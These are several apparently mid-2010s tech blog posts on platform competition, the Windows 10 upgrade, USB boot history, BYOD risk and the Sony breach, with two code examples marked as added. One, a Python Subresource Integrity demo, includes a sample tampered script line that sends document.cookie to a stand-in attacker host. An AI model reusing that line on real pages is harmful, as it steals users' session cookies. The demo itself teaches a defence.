21 Aug 15

The curse of the second mover

When I lived in Alaska, there was an obnoxious shirt that I used to see all the time, with a group of sled dogs pictured on it. The cutesy saying on it was, “If you’re not the lead dog, the view never changes.” While driving home last night and considering multiple tech marketplaces today, it came to mind.

Consider the following. If you were:

  1. Building an application for phones and tablets today, whose OS would you build it for first?
  2. Building a peripheral device for smartphones, what device platform would you build it for?
  3. Selling music today, whose digital music store would you make sure it was in first?
  4. Selling a movie today, whose digital video store would you make sure it was in first?
  5. Publishing a book, whose digital book store would you make sure it was in first?

Unless you’ve got a lot of time or money on your hands, and feel like dealing with the bureaucracy of multiple stores, the answer to all of the above is going to be exactly the same.

Except that last one.

If you’re building apps, smartphone peripherals, or selling music or movies, you’re probably building for Apple first. If you’re publishing or self-publishing a book, you’re probably going to Amazon first. One could argue that you might go to Amazon with music or a movie – but I’m not sure that’s true – at least if you wanted to actually sell full-fare copies vs. getting them placed on Prime Music/Prime Instant Video.

In the list above, that doesn’t tell a great tale for second movers. If you’re building a marketplace, you’ve got to offer some form of exceptional value over Apple (or Amazon for 5) in order to dethrone them. You’ve also got to offer something to consumers to get them to use your technology, and content purveyors/device manufacturers to get them to invest in your platform(s).

For the first three, Apple won those markets through pure first mover advantage.

The early arrival of the iPhone and iOS, and the premium buyers who purchase them, ensure that 1 & 2 will be answered “Apple”. The early arrival of the iPod, iTunes, and “Steve’s compromise”, allowing iTunes on Windows – as horrible as the software was/is – ensures that iTunes Music is still the answer to 3.

Video is a squishy one – as the market is meandering between streaming content (Netflix/Hulu), over-the-top (OTT) video services like Amazon Instant Video, MLB At Bat, HBO Now, etc., and direct purchase video like iTunes or Google Play. But the wide availability of Apple TV devices, entrenchment of iTunes in the life of lots of music consumers, and disposable income mean that a video content purveyor is highly likely to hit iTunes first – as we often see happen with movies today.

The last one is the most interesting though.

If we look at eBooks, something interesting happened. Amazon wasn’t the first mover – not by a long shot. Microsoft made their Reader software available back in 2000. But their device strategy wasn’t harmonized with the ideas from the team building the software. It was all based around using your desktop (ew), chunky laptop (eventually chunky tablet), or Windows Pocket PC device for reading. Basically, it was trying to sell eBooks as a way to read content on Windows, not really trying to sell eBooks themselves. Amazon revealed their first Kindle in 2007. (This was the first in a line of devices that I personally loathe, because of the screen quality and flicker when you change pages.) Apple revealed the iPad, and rapidly launched iBooks in 2010, eventually taking it to the iPhone and OS X. But the first two generations of iPad were expensive, chunky devices to try and read on, and iBooks not being available on the iPhone and OS X didn’t help. (Microsoft finally put down the Reader products in 2012, just ahead of the arrival of the best Windows tablets…<sigh/>) So even though Apple has a strong device story today, and a strong content play in so many other areas, they are (at least) the second fiddle in eBooks. They tout strong numbers of active iBooks users… but since every user of iOS and OS X can be an iBooks user, numbers mean little without book sales numbers behind them. Although Amazon’s value driven marketplace may not be the healthiest place for authors to publish their wares, it appears to be the number one place by far, without much potential for it to be displaced anytime soon.

If your platform isn’t the leader for a specific type of content, pulling ahead from second place is going to be quite difficult, unless you’ve somehow found some silver bullet. If you’re in third, you have an incredible battle ahead.


18 Aug 15

Continuum vs. Continuity – Seven letters is all they have in common

It’s become apparent that there’s some confusion between Microsoft’s Continuum feature in Windows 10, and Apple’s Continuity feature in OS X. I’ve even heard technical people get them confused.

But to be honest, the letters comprising “Continu” are basically all they have in common. In addition to different (but confusingly similar) names, the two features are platform exclusive to their respective platform, and perform completely different tasks that are interesting to consider in light of how each company makes money.

Apple’s Continuity functionality, which arrived first, on OS X Yosemite late in 2014, allows you to hand off tasks between multiple Apple devices. Start a FaceTime call on your iPhone, finish it on your Mac. Start a Pages document on your Mac, finish it on your iPad. If they’re on the same Wi-Fi network, it “just works”. The Handoff feature that switches between the two devices works by showing an icon for the respective app you were using, that lets you begin using the app on the other device. Switching from iOS to OS X is easy. Going the other way is a pain in the butt, IMHO, largely because of how iOS presents the app icon on the iOS login screen.

Microsoft’s Continuum functionality, which arrived in one form with Windows 10 in July, and will arrive in a different (yet similar) form with Windows 10 Mobile later this year, lets the OS adapt to the use case of the device you’re on. On Windows 10 PC editions, you can switch Tablet Mode off and on, or if the hardware provides it, it can switch automatically if you allow it. Windows 10 in Tablet Mode is strikingly similar to, but different from, Windows 8.1. Tablet mode delivers a full screen Start screen, and full-screen applications by default. Turning tablet mode off results in a Start menu and windowed applications, much like Windows 7.

When Windows 10 Mobile arrives later this year, the included incarnation of Continuum will allow phones that support the feature to connect to external displays in a couple of ways. The user will see an experience that will look like Windows 10 with Tablet mode off, and windowed universal apps. While it won’t run legacy Windows applications, this means a Windows 10 Mobile device could act as a desktop PC for a user that can live within the constraints of the Universal application ecosystem.

Both of these pieces of functionality (I’m somewhat hesitant to call either of them “features”, but I digress) provide strategic value for Apple, and Microsoft, respectively. But the value that they provide is different, as I mentioned earlier.

Continuity is sold as a “convenience” feature. But it’s really a great vehicle for hardware lock-in and upsell. It only works with iOS and OS X devices, so it requires that you use Apple hardware and iCloud. In short: Continuity is intended to help sell you more Apple hardware. Shocker, I know.

Continuum, on the other hand, is designed to be more of a “flexibility” feature. It adds value to the device you’re on, even if that is the only Windows device you own. Yes, it’s designed to be a feature that could help sell PCs and phones too – but the value is delivered independently, on each device you own.

With Windows 8.x, your desktop PC had to have the tablet-based features of the OS, even if they worked against your workflow. Your tablet couldn’t adapt well if you plugged it into an external display and tried to use it as a desktop. Your phone was… well… a phone. Continuum is intended to help users make the most of any individual Windows device, however they use it. Want a phone or tablet to be a desktop and act like it? Sure. Want a desktop to deliver a desktop-like experience and a tablet to deliver a tablet-like experience? No problem. Like Continuity, Continuum is platform-specific, and features like Continuum for Windows 10 Mobile will require all-new hardware. I expect that this Fall’s hardware season will likely continue to bring many new convertibles that automatically switch, helping to make the most of the feature, and could help sell new hardware.

Software vendors made Continuity-like functionality before Apple did it, and that’ll surely continue. We’ll see more and more device to device bridging in Android and Windows. However, Apple has an advantage here, with their premium consumer, and owning their entire hardware and software stack.

People have asked me for years if I see Apple making features that look like Continuum. I don’t. At least not trying to make OS X into iOS. We may see Apple try and bridge the tablet and small laptop market here in a few weeks with an iOS device that can act like a laptop, but arguably that customer wouldn’t be a MacBook (Air) customer anyway. It’ll be interesting to see how the iPad evolves/collides into the low-end laptop market.

Hopefully if you were confused about these two features, that helps clarify what they are – and that they’re actually completely different things, designed to accomplish completely different things.


03 Jun 15

Windows 10 and free. Free answers to frequently asked questions.

I keep hearing the same questions over and over again about Windows 10 and the free* upgrade, so I have decided to put together a set of frequently asked questions about the Windows 10 promotion.

Who gets it?

Q: Is Windows 10 really free?

Yes. It is free. Completely free. But only if you meet the qualifications and take Microsoft up on the offer from a qualified PC before July 29th, 2016.

You must have Windows 7, 8, or 8.1 installed on your x86 or x64 system, and it cannot be an Enterprise edition of Windows (only Home, Pro/Professional, Ultimate, or similar). See the bottom of this page for a significant disclaimer.

Q: Can I get the free upgrade if I have some version of Windows RT?

No free upgrade for you. Microsoft has indicated there’s a little something coming in the pipeline for you at some point, but haven’t indicated what that would be. It won’t be Windows 10, and won’t be the full Windows 10 for smartphones and small tablets either. MHO: Expect something more akin to Windows Phone 7.8.

Q: Can I get it for free if I have Enterprise edition of Windows 7, 8, or 8.1?

No. Enterprise edition must be purchased through the Volume Licensing channel, as it always has had to be. Talk to the people in your organization who handle Windows volume licensing.

Q: Can I get it for free if I’m in the Windows Insider program?

No. There’s no magic program rewarding Windows Insiders with a completely free full product. You have to have upgraded the system from a valid license for 7, 8, or 8.1. (See this tweet from @GabeAul.)

Q: Can I get it for free if I have Windows XP or Windows Vista?

No. You’ll need to either buy a legal copy of Windows 7, 8, or 8.1, or just purchase Windows 10 when it becomes available at retail, supposedly in late August, 2015. Your install of Windows does not qualify for the offer.

Q: Can I get it for free if I pirated Windows 7, 8, or 8.1?

Not really, no. If it was “Non-Genuine” before your upgrade, or Windows 10 recognizes it as such, it will still be Non-Genuine after the fact. You may be upgraded, but expect to be nagged. Your OEM might also be able to help you get legit… Or you could always buy a copy.

Q: Can I perform a clean install of Windows 10?

Yes, but you’ll have to do it after you’ve upgraded from a qualified install of Windows 7, 8, or 8.1 first. Then you can perform clean installs on that device at any time. (See yet another tweet from @GabeAul.)

Q: Can I upgrade all of my PCs for free?

Yes, if they each have a qualifying OS version and edition installed. But installing on one device doesn’t give you rights to run Windows 10 on any other system, or move an OEM install to a virtual machine.

Q: Can I upgrade my phone?

This is all about Windows 10 for your x86 or x64 PC, not your Windows Phone. Microsoft will have more details about Windows for phones at some point later this year, when they talk about it being released. It won’t be available at the same time as Windows 10 for PCs and tablets.


What edition do I get?

Q: I have Media Center, K, N, Ultimate, or some other transient edition – what do I get?

Check out “What edition of Windows will I get as a part of this free upgrade?” on this page. If you have a K or N install, you will be upgraded to the parent edition for the K or N OS you are licensed for.

Q: When will I get the upgrade?

See “What happens when I reserve?” on this page. In general, once you reserve on that device, it’ll download automatically and you’ll be notified when it is ready to install, on or about July 29th, 2015.


What breaks if I upgrade?

Q: Can I still run Windows Media Center after I upgrade to Windows 10?

No. According to this page, if you upgrade a system that is running Media Center software to Windows 10, it will be uninstalled. If you use/love Media Center on a given system, I would strongly advise not upgrading to Windows 10 on that system, as it will be deleted.

Mass hysteria

Q: Is this thing running in my system notification area malware?

You might have malware, but the little flag running over there isn’t it. It’s just Microsoft working to get every qualified Windows install that they can to Windows 10 within a year’s time. Enjoy your free lunch.

Q: How do I stop users in my organization from installing Windows 10 on systems I manage?

If it’s a domain-joined Windows Pro system, or a Windows Enterprise system, have no fear. They aren’t getting prompted.

Q: How do I stop users in my organization from installing Windows 10 on BYOD systems I don’t manage?

If it is a system running Windows Home (or similar, like “Windows 8.1” with no suffix), or a Windows Pro/Professional system that isn’t joined to the domain, and you don’t manage it in any way, you’re kind of up the creek on this one. This article provides info on KB3035583, which needs to be uninstalled to stop the promotion, and you’ll need to figure out a way to remove it on each of those systems.
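One way to check a Windows 7 or 8.1 machine for KB3035583 and remove it, as an added example that is not part of the original post; it assumes an elevated PowerShell session and relies on the standard wusa.exe uninstall switches.

```powershell
# Added example: detect and remove the "Get Windows 10" update (KB3035583).
# Assumes an elevated PowerShell session on Windows 7 / 8.1; wusa.exe performs the removal.
$kb = 'KB3035583'

# Get-HotFix reads the same installed-updates list that Control Panel shows.
$installed = Get-HotFix -Id $kb -ErrorAction SilentlyContinue

if (-not $installed) {
    Write-Output "$kb is not installed on $env:COMPUTERNAME."
    return
}

Write-Output "$kb found (installed $($installed.InstalledOn)); removing..."

# /quiet and /norestart keep the removal non-interactive; the reboot is left to the admin.
$proc = Start-Process -FilePath "$env:SystemRoot\System32\wusa.exe" `
    -ArgumentList "/uninstall /kb:3035583 /quiet /norestart" `
    -Wait -PassThru

# wusa returns 0 on success and 3010 when a restart is still needed to finish.
switch ($proc.ExitCode) {
    0       { Write-Output "$kb removed." }
    3010    { Write-Output "$kb removed; a restart is required to finish." }
    default { Write-Warning "wusa exited with code $($proc.ExitCode)." }
}
```

Windows Update may offer the same KB again on a later check, so hiding it there after removal is worth doing as well.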


Q: Microsoft will charge me in a year for updates, won’t they?

No. They won’t. Microsoft has stated that they will not charge for “free, ongoing security updates for the supported lifetime of the device.” Microsoft may well charge for a future upgrade to some other version of the OS. But I don’t see them going back on this as stated.



22 May 15

Be the toolmaker

We are toolmakers, humankind.

To resist this tendency to solve riddles, to complete tasks faster, with more efficiency, with less risk or human cost, is to resist our gift of ingenuity.

Humans are not born to be cogs. We are not born to be tools.

We are born to be toolmakers – to make the world better than we found it.

Making tools is not without risk or obligation, however. Efficiency often comes with financial benefit to the toolmaker, but human costs to those replaced by the tool.

The obligation isn’t to preserve the role of humans performing the menial tasks that toolmakers can, and gradually will, automate and replace.

The obligation is to lift up people affected by shifting tides of technology and efficiency, and help them to become toolmakers themselves.

To enable them to make their lives better due to advancing technology, not worse.


22 May 15

Farewell, floppy diskette

I never would have imagined myself in an arm-wrestling match with the floppy disk drive. But sitting where I did in Windows setup, that’s exactly what happened. A few times.

When I had started at Microsoft, a boot floppy was critical to setting up a new machine. Not by the time I was in setup. Since Remote Installation Services (RIS) could start with a completely blank machine, and you could now boot a system to WinPE using a CD, there were two good-sized nails in the floppy diskette’s coffin.

Windows XP was actually the first version of Windows that didn’t ship with boot floppies. It only shipped with a CD. While you could download a tool that would build boot floppies for you, most computers that XP happily ran on supported CD boot by that time. The writing was on the wall for the floppy diskette. In the months after XP released, Bill Gates made an appearance on the American television sitcom Frasier. Early in the episode, a caller asks about whether they need diskettes to install Windows XP. For those of us on the team, it was amusing. Unfortunately, the reality was that behind the scenes, there were some issues with customers whose systems didn’t boot from CD, or didn’t boot properly, anyway. We made it through most of those birthing pains, though.

It was both a bit amusing and a bit frustrating to watch OEMs early on during the early days of Windows XP; while customers often said, “I want a legacy free system”, they didn’t know what that really meant. By “legacy free”, customers usually meant they wanted to abandon all of the legacy connectors (ports) and peripherals used on computers before USB had started to hit its stride with Windows 98.

While USB had replaced serial in terms of mice – which were at one time primarily serial – the serial port, parallel port, and floppy disk controller often came integrated together in the computer. We saw some OEMs not include a parallel port, and eventually not include a floppy diskette, but still include a serial port – at least inside – for when you needed to debug the computer. When a Windows machine has software problems, you often hook it up to a debugger, an application on another computer, where the developer can “step through” the programming code to figure out what is misbehaving. When Windows XP shipped, a serial cable connection was the primary way to debug. Often, to make the system seem more legacy free than it actually was, this serial port was tucked inside the computer’s case – which made consumers “think” it was legacy free when it technically wasn’t. PCs often needed BIOS updates, too – and even when Windows XP shipped with them, these PCs would still usually boot to an MS-DOS diskette in order to update the BIOS.

My arrival in the Windows division was timely; when I started, USB Flash Drives (UFDs) were just beginning to catch on, but had very little storage space, and the cheapest ones were slow and unreliable. 32MB and 64MB drives were around, but still not commonplace. In early 2002, the idea of USB booting an OS began circling around the Web, and I talked with a few developers within The Firm about it. Unfortunately, there wasn’t a good understanding of what would need to happen for it to work, nor was the UFD hardware really there yet. I tabled the idea for a year, but came back to it every once in a while, trying to research the missing parts.

As I tinkered with it, I found that while many computers supported boot from USB, they only supported USB floppy drives (a ramshackle device that had come about, and largely survived for another 5-10 years, because we were unable to make key changes to Windows that would have helped kill it). I started working with a couple of people around Microsoft to try and glue the pieces together to get WinPE booting from a UFD. I was able to find a PC that would try to boot from the disk, and failed because the disk wasn’t prepared for boot as a hard disk normally would be. I worked with a developer from the Windows kernel team and one of our architects to get a disk formatted correctly. Windows didn’t like to format UFDs as bootable because they were removable drives; even Windows to Go in Windows 8.1 today boots from special UFDs which are exceptionally fast, and actually lie to the operating system about being removable disks. Finally, I worked with another developer who knew the USB stack when we hit a few issues booting. By early 2003, we had a pretty reliable prototype that worked on my Motion Computing Tablet PC.

Getting USB boot working with Windows was one of the most enjoyable features I ever worked on, although it wasn’t a formal project in my review goals (brilliant!). USB boot was even fun to talk about, amongst co-workers and Microsoft field employees. You could mention the idea to people and they just got it. We were finally killing the floppy diskette. This was going to be the new way to boot and repair a PC. Evangelists, OEM representatives, and UFD vendors came out of the woodwork to try and help us get the effort tested and working. One UFD manufacturer gave me a stash of 128MB and larger drives – very expensive at the time – to prepare and hand out to major PC OEMs. It gave us a way to test, and gave the UFD vendor some face time with the OEMs.

For a while, I had a shoebox full of UFDs in my office which were used for testing; teammates from the Windows team would often email or stop by asking to get a UFD prepped so they could boot from it. I helped field employees get it working so many times that for a while, my nickname from some in the Microsoft field was “thumbdrive”, one of the many terms used to refer to UFDs.

Though we never were able to get UFD booting locked in as an official feature until Windows Vista, OEMs used it before then, and it began to go mainstream. Today, you’d be hard pressed to find a modern PC that can’t boot from UFD, though the experience of getting there is a bit of a pain, since the PC boot experience, even with new EFI firmware, still (frankly) sucks.

Computers usually boot from their HDD all the time. But when something goes wrong, or you want to reinstall, you have to boot from something else; a UFD, CD/DVD, PXE server like RIS/WDS, or sometimes an external HDD. Telling your Windows computer what to boot from if something happens is a pain. You have to hit a certain key sequence that is often unique to each OEM. Then you often have to hit yet another key (like F12) to PXE boot. It’s a user experience only a geek could love. One of my ideas was to try and make it easier not only for Windows to update the BIOS itself, but for the user to more easily say what they wanted to boot the PC from (before they shut it down, or selecting from a pretty list of icons or a set of keys – like Macs can do). Unfortunately, this effort largely stalled out for over a decade until Microsoft delivered a better recovery, boot, and firmware experience with their Surface tablets. Time will tell whether we’re headed towards a world where this isn’t such a nuisance anymore.

It’s actually somewhat amusing how much of my work revolved around hardware even though I worked in an area of Windows which only made software. But if there was one commonly requested design change request that I wish I could have accommodated but couldn’t ever get done, it was F6 from UFD. Let me explain.

When you install Windows, it attempts to use the drivers it ships with on the CD to begin copying Windows down onto the HDD, or to connect over the network to start setup through RIS.

This approach worked alright, but it had one little problem which became significant. Not long after Windows XP shipped, new categories of networking and storage devices began arriving on high-end computers and rapidly making their way downmarket; these all required new drivers in order for Windows to work. Unfortunately, none of these drivers were “in the box” (on the Windows CD) as we liked to say. While Windows Server often needed special drivers to install on some high-end storage controllers before, this was really a new problem for the Windows consumer client. All of a sudden we didn’t have drivers on the CD for the devices that were shipping on a rapidly increasing number of new PCs.

In other words, even with a new computer and a stock Windows XP CD in your hand, you might never get it working. You needed another computer and a floppy diskette to get the ball rolling.

Early on during Windows XP’s setup, it asks you to press the keyboard’s F6 function key if you have special drivers to install. If it can’t find the network and you’re installing from CD, you’ll be okay through setup – but then you have no way to add new drivers or connect to Windows Update. If you were installing through RIS and you had no appropriate network driver, setup would fail. Similarly, if you had no driver for the storage controller on your PC, it wouldn’t ever find a HDD where it could install Windows – so it would terminally fail too. It wasn’t pretty.

Here’s where it gets ugly. As I mentioned, we were entering an era where OEMs wanted to ship, and often were shipping, those legacy-free PCs. These computers often had no built-in floppy diskette – which was the only place we could look for F6 drivers at the time. As a result, not long after we shipped Windows XP, we got a series of design change requests (DCRs) from OEMs and large customers to make it so Windows setup could search any attached UFD for drivers as well. While this idea sounds easy, it isn’t. This meant having to add Windows USB code into the Windows kernel so it could search for the drives very early on, before Windows itself has actually loaded and started the normal USB stack. While we could consider doing this for a full release of Windows, it wasn’t something that we could easily do in a service pack – and all of this came to a head in 2002.

Dell was the first company to ever request that we add UFD F6 support. I worked with the kernel team, and we had to say no – the risk of breaking a key part of Windows setup was too great for a service pack or a hotfix, because of the complexity of the change, as I mentioned. Later, a very large bank requested it as well. We had to say no then as well. In a twist of fate, at Winternals I would later become friends with one of the people who had triggered that request, back when he was working on a project onsite at that bank.

Not adding UFD F6 support was, I believe, a mistake. I should have pushed harder, and we should have bitten the bullet in testing it. As a result of us not doing it, a weird little cottage industry of USB floppy diskette drives continued for probably a decade longer than it should have.

So it was, several years after I left, that the much maligned Windows Vista brought both USB boot of WinPE and also brought USB F6 support so you could install the operating system on hardware with drivers newer than Windows XP, and not need a floppy diskette drive to get through setup.

As I sit here writing this, it’s interesting to consider the death of CD/DVD media (“shiny media”, as I often call it) on mainstream computers today. When Apple dropped shiny media on the MacBook Air, people called them nuts – much as they did when Apple dropped the floppy diskette on the original iMac years before. As tablets and Ultrabooks have finally dropped shiny media drives, there’s an odd echo of the floppy drive from years ago. Where external floppy drives were needed for specific scenarios (recovery and deployment), external shiny media drives are still used today for movies, some storage and installation of legacy software. But in a few years, shiny media will be all but dead – replaced by ubiquitous high-speed wired and wireless networking and pervasive USB storage. Funny to see the circle completed.


21 May 15

Comments closed

I’m tired of filtering out spam from the comments. As a result, if you want to comment on a post, find me on Twitter.

Thanks for reading.


12 Feb 15

Bring your own stuff – Out of control?

The college I went to had very small cells… I mean dorm rooms. Two people to a small concrete walled-room, with a closet, bed, and desk that mounted to the walls. The RA on my floor (we’ll call him “Roy”) was a real stickler about making us obey the rules – no televisions or refrigerators unless they were rented from the overpriced facility in our dorm. After all, he didn’t want anybody creating a fire hazard.

But in his room? A large bench grinder and a sanding table, among other toys. Perhaps it was a double standard… but he was the boss of the floor – and nobody in the administration knew about it.

Inside of almost every company, there are several types of Roy, bringing in toys that could potentially harm the workplace. Most likely, the harm will come in the form of data loss or a breach, not a fire as it might if they brought in a bench grinder. But I’m really starting to get concerned that too many companies aren’t mindful of the volume of toys that their own Roys have been bringing in.

Basically, there are three types of things that employees are bringing in through rogue or personal purchasing:

  • Smartphones, tablets, and other mobile devices (BYOD)
  • Standalone software as a service
  • Other cloud services

It’s obvious that we’ve moved to a world where employees are often using their own personal phones or tablets for work – whether it becomes their main device or not. But the level of auditing and manageability offered by these devices, and the level of controls that organizations are actively enforcing on them, all leave a lot to be desired. I can’t fathom the number of personal devices today, most of them likely equipped with no passcode or a weak one, that are currently storing documents that they shouldn’t be. That document that was supposed to be kept only on the server… That billing spreadsheet with employee salaries or patient SSNs… all stored on someone’s phone, with a horrible PIN if one at all, waiting for it to be lost or stolen.

Many “freemium” apps/services offer just enough rope for an employee to hang their employer with. Sign up with your work credentials and work with colleagues – but your management cannot do anything to manage them – without (often) paying.

Finally, we have developers and IT admins bringing in what we’ll call “rogue cloud”. Backing up servers to Azure… spinning up VMs in AWS… all with the convenience of a credit card. Employees with the best of intentions can smurf their way through without getting caught by internal procedures or accounting. A colleague tells a story about a CFO asking, “Why are your developers buying so many books?” The CFO was, of course, asking about Amazon Web Services, but had no idea, since the charges were small irregular amounts every month across different developers, from Amazon.com. I worry that the move towards “microservices” and cloud will result in stacks that nobody understands, that run from on-premises to one or more clouds – without an end-to-end design or security review around them.

Whether we’re talking about employees bringing devices, applications, or cloud services, the overarching problem here is the lack of oversight that so many businesses seem to have over these rapidly growing and evolving technologies, and the few working options they have to remediate them. In fact, many freemium services are feeding on this exact problem, and building business models around it. “I’m going to give your employees a tool that will solve a problem they’re having. But in order for you to solve the new problem that your employees will create by using it, you’ll need to buy yet another tool, likely for everybody.”

If you aren’t thinking about the devices, applications, and services that your employees are bringing in without you knowing, or without you managing them, you really might want to go take a look and see what kinds of remodeling they’ve been doing to your infrastructure without you noticing. Want to manage, secure, integrate, audit, review, or properly license the technology your employees are already using? You may need to get your wallet ready.


24
Dec 14

Mobile devices or cloud as a solution to the enterprise security pandemic? Half right.

This is a response to Steven Sinofsky’s blog post, “Why Sony’s Breach Matters”. While I agree with parts of his thesis – the parts about layers of complexity leaving us where we are, and secured, legacy-free mobile OSes helping alleviate this on the client side – I’m not sure I agree with his points about the cloud being a path forward, at least in any near term, or to the degree of precision he alludes to.

The bad news is that the Sony breach is not unique. Not by a long shot. It’s not the limit. It’s really the beginning. It’s the shot across the bow for companies that will let them see one example of just how bad this can get. Of course, they should’ve been paying attention to Target, Home Depot, Michaels, and more by this point already.

Instead, the Sony breach is emblematic of the security breaking point that has become increasingly visible over the last 2 years. It would be the limit if the industry turned a corner tomorrow and treated security like their first objective. But it won’t. I believe what I’ve said before – the poor security practices demonstrated by Sony aren’t unique. They’re typical of how too many organizations treat security. Instead of trying to secure systems, they grease the skids just well enough to meet their compliance bar, turning a blind eye to security that’s just “too hard”.

While the FBI has been making the Sony attack sound rather unique, the only unique aspect of this one, IMHO, is the scale of success it appears to have achieved. This same attack could be replayed pretty easily. A dab of social engineering… a selection of well-chosen exploits (they’re not that hard to get), and Windows’ own management infrastructure appears to have been used to distribute it.

I don’t necessarily see cloud computing yet as the holy grail that you do. Mobile? Perhaps.

The personal examples you discussed were all interesting examples, but indeed were indicative of more of a duct-tape approach, similar to what we had to do with some things in Windows XP during the security push that led up to XPSP2 after XPSP1 failed to fill the holes in the hull of the ship. A lot of really key efforts, like run as non-admin just couldn’t have been done in a short timeframe to work with XP – had to be pushed to Vista (where they honestly still hurt users) or Windows 7 where the effort could be taken to really make them work for users from the ground up. But again, much of this was building foundations around the Win32 legacy, which was getting a bit sickly in a world with ubiquitous networking and everyone running as admin.

I completely agree as well that we’re long past adding speed bumps. It is immediately apparent, based upon almost every breach I can recall over the past year, that management complexity as a security vector played a significant part in the breach.

If you can’t manage it, you can’t secure it. No matter how many compliance regs the government or your industry throws at you. It’s quite the Gordian knot. Fun stuff.

I think we also completely agree about how the surface area exposed by today’s systems is to blame for where we are today as well. See my recent Twitter posts. As I mentioned, “systems inherently grow to become so complex nobody understands them.” – whether you’re talking about programmers, PMs, sysadmins, or compliance auditors.

I’m inclined to agree with your point about social and the vulnerabilities of layer 8, and yet we also do live in a world where most adults know not to stick a fork into an AC outlet. (Children are another matter.)

Technology needs to be more resilient to user-error or malignant exploitation, until we can actually solve the dancing pigs problem where it begins. Mobile solves part of that problem.

When Microsoft was building UAC during Longhorn -> Vista, Mark Russinovich and I were both frustrated that Microsoft wasn’t really doing anything with Vista to really nail security down, and so we built a whitelisting app at Winternals to do this for Windows moving forward. (Unfortunately, Protection Manager was crushed for parts after our acquisition, and AppLocker was/is too cumbersome to accomplish this for Win32.) Outside of the longshot of ditching the Intel processor architecture completely, whitelisting is the only thing that can save Win32 from the security mayhem it is experiencing at the moment.

I do agree that moving to hosted IaaS really does nothing for an organization, except perhaps drive them to reduce costs in a way that on-premises hosting can’t.

But I guess if there was one statement in particular that I would call out in your blog as something I heartily disagree with, it’s this part:

“Everyone has moved up the stack and as a result the surface area dramatically reduced and complexity removed. It is also a reality that the cloud companies are going to be security first in terms of everything they do and in their ability to hire and maintain the most sophisticated cyber security groups. With these companies, security is an existential quality of the whole company and that is felt by every single person in the entire company.”

This is a wonderful goal, and it’ll be great for startups that have no legacy codebase (and don’t bring in hundreds of open-source or shared libraries that none of their dev team understands down to the bottom of the stack). But most existing companies can’t do what they should, and cut back the overgrowth in their systems.

I believe pretty firmly that what I’ve seen in the industry over the last decade since I left Microsoft is also, unfortunately, the norm – that management – as demonstrated by Sony’s leadership in that interview – will all too often let costs win over security.

For organizations that can redesign for a PaaS world, the promise offered by Azure was indeed what you’ve suggested – that designing new services and new applications for a Web-first world can lead to much more well-designed, refined, manageable, and securable applications and systems overall. But the problem is that that model only works well for new applications – not applications that stack refinement over legacy goo that nobody understands. So really, clean room apps only.

The slow uptake of Azure’s PaaS offerings unfortunately demonstrates that this is the exception, and an ideal, not necessarily anything that we can expect to see become the norm in the near future.

Also, while Web developers may not be integrating random bits of executable code into their applications, the amount of code reuse across the Web threatens to do the same, although the security perimeter is winnowed down to the browser and PII shared within it. Web developers can and do grab shared .js libraries off the Web in a heartbeat.

Do they understand the perimeter of these files? Absolutely not. No way.

Are the risks here as big as those posed by an unsecured Win32 perimeter? Absolutely not – but I wouldn’t trivialize them either.

There are no more OS hooks, but I’m terrified about how JS is evolving to mimic many of the worst behaviors that Win32 picked up over the years. The surface has changed, as you said – but the risks – loss of personal information, loss of data, phishing, DDoS – are so strikingly similar, especially as we move to a “thicker”, more app-centric Web.
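As an added example (not code from the original post), here is the one control a site can apply to a script it pulls off someone else’s server: Subresource Integrity, where the page pins the hash of the exact bytes it expects and the browser refuses to execute anything else. The library body and the tampered copy below are constructed; the tag format follows the SRI spec, and the verify() function mimics the browser-side check in Python so it can be exercised offline.

```python
import base64
import hashlib

# Constructed stand-in for a library a page would fetch from a CDN.
LIBRARY_JS = b"(function(){window.widget=function(el){el.textContent='hi';};})();\n"

# The same library after somebody (CDN compromise, a "helpful" one-line tweak
# upstream) altered it: one extra statement that exfiltrates the cookie.
TAMPERED_JS = LIBRARY_JS + b"new Image().src='https://attacker.invalid/?c='+document.cookie;\n"

# SRI permits only these digest algorithms; when an integrity attribute lists
# several tokens, only the strongest algorithm present is consulted.
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return the SRI metadata token for body, e.g. 'sha384-<base64 digest>'."""
    if algo not in STRENGTH:
        raise ValueError("SRI only permits sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Emit the <script> tag a build step would write for a pinned script.

    crossorigin="anonymous" matters for cross-origin scripts: without CORS the
    browser treats the response as opaque and cannot check the hash at all."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            f'crossorigin="anonymous"></script>')


def verify(body: bytes, integrity: str) -> bool:
    """Mimic the browser-side check on a fetched body.

    Per the spec the browser ignores tokens whose algorithm it doesn't
    support, considers only the strongest supported algorithm present, and
    passes if any token of that algorithm matches. An attribute with no
    usable token is treated as if it were absent, so the resource loads
    unchecked: a typo in the algorithm name silently disables the protection."""
    tokens = [t for t in integrity.split() if t.partition("-")[0] in STRENGTH]
    if not tokens:
        return True
    strongest = max(STRENGTH[t.partition("-")[0]] for t in tokens)
    return any(
        STRENGTH[t.partition("-")[0]] == strongest
        and sri_hash(body, t.partition("-")[0]) == t
        for t in tokens
    )


if __name__ == "__main__":
    tag = script_tag("https://cdn.example/widget.js", LIBRARY_JS)  # hypothetical URL
    pinned = sri_hash(LIBRARY_JS)
    print(tag)
    print("original loads:", verify(LIBRARY_JS, pinned))
    print("tampered loads:", verify(TAMPERED_JS, pinned))
```

SRI only answers “did I get the bytes I reviewed?”; it says nothing about whether those bytes were safe to begin with, and it has to be regenerated every time the dependency is legitimately updated, which is the point at which someone should actually read the diff.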

Overall, I think we are in for some changes, and I agree with what I believe you’ve said both in your blog and on Twitter, that modern mobile OSes with a perimeter designed in them are the only safe path forward. The path towards a secure Web application perimeter seems less clear, far less immediate, and perhaps less explicit than your post seemed to allude to.

There is much that organizations can learn from the Sony breach.

But will they?


15
Dec 14

Who shot Sony?

I’m curious about the identity of the group that broke into Sony, apparently caused massive damage, and compromised a considerable amount of information that belongs to the company.

For some reason, journalists aren’t focusing on this, however. Probably because it doesn’t generate the clicks and ad views that publishing embarrassing emails, salary disclosures, and documented poor security practices do. Instead, they’re primarily focusing on revealing Sony’s confidential information, conveniently provided in multiple, semi-regular doc dumps by the party behind the breach.

